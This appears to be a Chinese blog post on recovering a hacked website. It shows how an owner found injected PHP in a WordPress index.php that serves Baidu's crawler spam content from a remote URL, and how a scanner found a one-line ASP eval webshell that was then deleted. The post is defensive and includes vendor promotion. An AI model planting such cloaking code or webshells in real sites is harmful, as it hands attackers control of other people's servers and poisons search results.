文章目录

  • 网站被黑了、被挂马、被篡改后,自己如何解决网站被挂马?
    • 示例:
    • 方法一
      • 一、 发现被黑,网站被黑的症状
      • 二、自己猜想了一下原因,页面和百度抓取收录显示不一致。查服务器日志方案不可行。
      • 三、找到了问题解决的关键路线,使用useragent-watch
      • 四、找到被修改的源代码
      • 五、 解释下这段php代码的意思:
    • 方法二
      • 解决办法:

网站被黑了、被挂马、被篡改后,自己如何解决网站被挂马?

所谓的挂马:
就是黑客通过各种手段,包括SQL注入,网站敏感文件扫描,服务器漏洞,网站程序0day, 等各种方法获得网站管理员账号,然后登陆网站后台,通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。

示例:

方法一

一、 发现被黑,网站被黑的症状

两年前自己用wordpress搭了一个网站,平时没事写写文章玩玩。但是前些日子,突然发现网站的流量突然变小,site了一下百度收录,发现出了大问题,网站被黑了。大多数百度抓取收录的页面title和description被篡改,如下图,title标题被改成xx友情链接,描述description是一些广告网址。但是点进去以后,访问正常,页面显示正常,页面源代码也正常,丝毫没有被篡改的痕迹。但是,为什么百度爬虫会抓取到这些广告文字呢,这些文字哪里来的?

二、自己猜想了一下原因,页面和百度抓取收录显示不一致。查服务器日志方案不可行。
>网站实际页面和百度排虫收录显示不一致,网站源代码肯定被了,但怎么改的,改在哪里不知道,服务器里代码文件有几百个,一个个检查,一行行看源代码肯定不现实。首先想到了检查服务器日志。但是问题是不知道骇客哪天改的,所以只能调出了几个星期的服务器日志来检查。可是,检查日志也是庞大的工程,而且对此经验不足,也很费事,也不一定有结果。因此,只能又寻求新的办法。
三、找到了问题解决的关键路线,使用useragent-watch
  1. 页面内容没变,但百度排虫抓取错了,问题肯定出在爬虫抓取身上。所以如果能看到排虫抓取的整个流程,或许会会找到答案。一番研究之后,找到了一个工具“user-agent-switcher”,可以模拟各种设备和搜索引擎排虫,chrome和火狐浏览器都有插件可以安装。chrome安装useragent-watch之后,添加百度爬虫useragent 设置:Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)。如图。

其他搜索引擎useragent:http://hi.baidu.com/romicboy/item/afc8d8d217278d5bd63aae22
2. 设置完以后,切换到模拟百度爬虫状态,再次访问我的网站,这次果然现原形了,网站这次跳到了另一个网站页面,这个页面内容就是,我网站在百度上显示的那些广告信息,如下图。再把useragent切换回来,输入我的网站域名,这次访问一切正常。这次可以下结论了,问题是在useragent上。骇客肯定修改了网站的源代码,而且是在源代码里加了判断语句,如果是当前请求的useragent是搜索引器爬虫,就把排虫引到把广告页面,如果是其他的就正常执行的。

四、找到被修改的源代码

虽然找到了问题原因,但是该怎么找到被修改的文件呢。不过,了解了wordpress源代码文件执行顺序流程,一切就很简单了,如下图,按照顺序一个个文件找很快就能找到。

登录到ftp,按照文件首先找到了index.php文件,果然,运气不错,第一个文件就是被修改的。骇客在代码最开始就添加了如下图的代码。

如果还是被反复篡改被入侵的话建议找专业做安全的来处理Sine安全公司是一家专注于:服务器安全、网站安全、网站漏洞检测、网站安全测试、渗透测试服务一体的网络安全服务提供商。

五、 解释下这段php代码的意思:
$file="http://www.XXXX.com/XXXX/X.htm";$referer=$_SERVER["HTTP_REFERER"];//来路的网址url$agent= strtolower($_SERVER["HTTP_USER_AGENT"]);//当前请求的内容转化成小写//如果是从百度点到该页的if (strstr($referer,"baidu")&&strstr($referer,"456")) {Header("Location: $url");  //转到原来的正常url}//如果是百度排虫if (ereg("http://www.baidu.com/search/spider.htm",$agent)) {$content=file_get_contents($file);  //转到之前定义的那个url页面echo $content;exit;}

把这一段删了,就ok了。重新提交百度,让百度重新抓取,过了几天百度快照更新就好了。

原文作者:websinesafe

方法二

解决办法:

就是先查清楚病因后除根,于是用FTP把网站程序全部打包下来然后一个一个文件的检查,看看有没有其他名字的文件;

我在网上查到一般木马文件名字都是global.asa global.asp 啥的,反正是些不熟悉的文件名,

检查了一下没有发现特殊的文件名字,于是开始检查代码方面,
都知道程序员写代码能累死,于是用 sinesafe网站挂马 代码检查工具,( 这个工具是专门检查挂马代码的和木马代码的。)
我把网站程序的代码文件放到工具检测了一下,发现了木马代码<%eval request("hack")%> eval 的特征代码,找到这个代码后我就给删除了,重复的用挂马检测工具检查了好几遍,没有发现问题后,我这才放心。

最后,连接到FTP,把网站程序重新上传了一遍,网站这才稳定下来。

具体参考:baidu教程

以上就是关于“ 网站被黑了被挂马篡改后,如何解决网站被挂马? ” 的全部内容。

网站被黑了被挂马篡改后,如何解决网站被挂马?相关推荐

  1. 把百度网站设为首页_大仙SEO:如何解决网站首页百度收录后被删除?【SEO案例】...

    前天(5/20)看数据的时候,发现5118数据直线下降,跌的有些厉害,猜测网站应该出问题了.这个时候不要慌(内心实则慌的一批),在等等看,会不会是百度自身的一些调整.算了分析分析网站吧!site看网站 ...

  2. 网站被黑有什么影响?为什么网站被黑了?如何防止网站被黑?

    如果一个网站被黑了,就意味着该网站存在很多安全隐患和漏洞.即使你登录服务器找到源文件进行修复,仍然会面临再次被黑的风险.只有发现并修复网站漏洞,才能避免重蹈覆辙,有效防止黑客攻击. 网站被黑客入侵有什 ...

  3. 怎么看网站是否被黑防止网站被黑

    网站被黑,打开网站竟然跳转到博cai网站上去了,一开始以为自己看错了,多次从百度点击自己网站进去,还是会跳转到彩piao网站上,第一反应是自己的网站被黑了,经营网站很多年了,从来未遇到过这种情况. 先 ...

  4. Bugku CTF Web 网站被黑

    网站被黑 启动靶机 f12查源码,没什么发现,上我的御剑大宝贝扫一下目录 发现就扫出来几个目录,就是个目录遍历,看了一下也没什么新发现 思考了一下,网站被黑的话,黑客一般会留后门,此网站是php站,所 ...

  5. 如何解决网站首页老是被篡改经常反复被篡改

    网站首页被篡改说明你网站程序有漏洞导致被上传了脚本后门木马 从而进行篡改内容被百度收录一些BC内容和垃圾与网站不相关的内容,建议找专业做安全的来进行网站安全服务漏洞检测与修补以及代码安全审计,清理网站 ...

  6. 网站被挂马怎么解决_网站被黑解决办法

    网站被挂马后,我们打开的页面重则整个页面都被篡改为对方的页面,轻则打开看不出变化实际上在搜索引擎我们的标题和描述都被不法分子修改了,不看源代码我们都不能够轻易的察觉出来.接下来我们来看看这一类网站被黑 ...

  7. 网站频繁被挂马篡改 防止网站被攻击的解决妙招

    在网站运营以及优化这方面总是会有一些无所事事的人,冒着风险做各种各样的违规行为的工作,有的时候忽然发现自己的公司网站,就被他人直接挂了木马,那些超链接鼠标点击进来,全部都是灰色内容的信息,不妥善处理, ...

  8. 网站被黑挂黑链跳转处理 网站被攻击解决方法

    一.网站被黑,即黑客通过主机及程序漏洞掌握了网站修改权.网站被黑的形式有以下几种,请自检. 1.网站标题title被修改 2.网站被挂黑链(页面中看不见,需要检查源代码是否有大师第三方网址) 3.网站 ...

  9. 最新网站被挂马被跳转解决办法

    撸了今年阿里.头条和美团的面试,我有一个重要发现.......>>> 最近收到一位客户的反馈,告知网站又被挂马,(织梦程序真让人头疼总是被挂马,dedecms经常是被挂马真晕了是的~ ...

最新文章

  1. pytorch中torch.manual_seed()的理解
  2. pause容器作用_Kubernetes学习之pause容器
  3. java 实现数据结构之队列
  4. ACL'22 | 关系抽取和NER等论文分类整理
  5. missing arguments for method toArray in trait Collection
  6. 视频中场的概念(1080I和1080P)和BT601/656/709/1120/2020/2077
  7. 动态规划(一)——矩阵连乘
  8. 生化危机5显示无法连接服务器,《生化危机5》黄金版无法联机怎么办?
  9. 高通功耗调试17之TLOC DEAMON导致待机/亮屏电流异常问题
  10. SpringBoot Elasticsearch工具类封装
  11. c语言用星号编写矩形,c语言星号打印矩形三角形菱形等图案.doc
  12. csv逗号分割不兼容 解决_excel保存为csv 不兼容的功能
  13. 华为p4支持鸿蒙功能吗_华为鸿蒙2.0系统支持的手机型号 华为鸿蒙2.0系统详解[多图]...
  14. wifi mesh组网
  15. 超微服务器查型号,超微 云服务器
  16. 联想T460p加装固态硬盘
  17. 次日即流失?直播App如何运营超级用户?
  18. py实现外星人入侵(二次开发)——3.随机生成外星人和方向
  19. 高斯判别分析 matlab,机器学习导论(5)–GDA高斯判别模型
  20. 汽车后市场O2O的掘金点在供应链金融

热门文章

  1. Java基础-String、StringBuffer、StringBuilder的区别
  2. 一天一个设计模式之JS实现——建造者模式
  3. unity3d 2D版本见缝插针demo
  4. [程序人生]: 判断字符串是否为出栈序列
  5. 12款最佳的 WordPress 语法高亮插件推荐
  6. 在websphere部署完war包后出现com.ibm.ws.jsp.JspCoreException: JSPG0218E异常
  7. 微软官方及第三方SDK http://msdn.microsoft.com/zh-cn/jj923044
  8. 利用Hook技术实现键盘监控
  9. 进行优化处理(WinXP),加快系统运行速度
  10. OJ1003: 两个整数的四则运算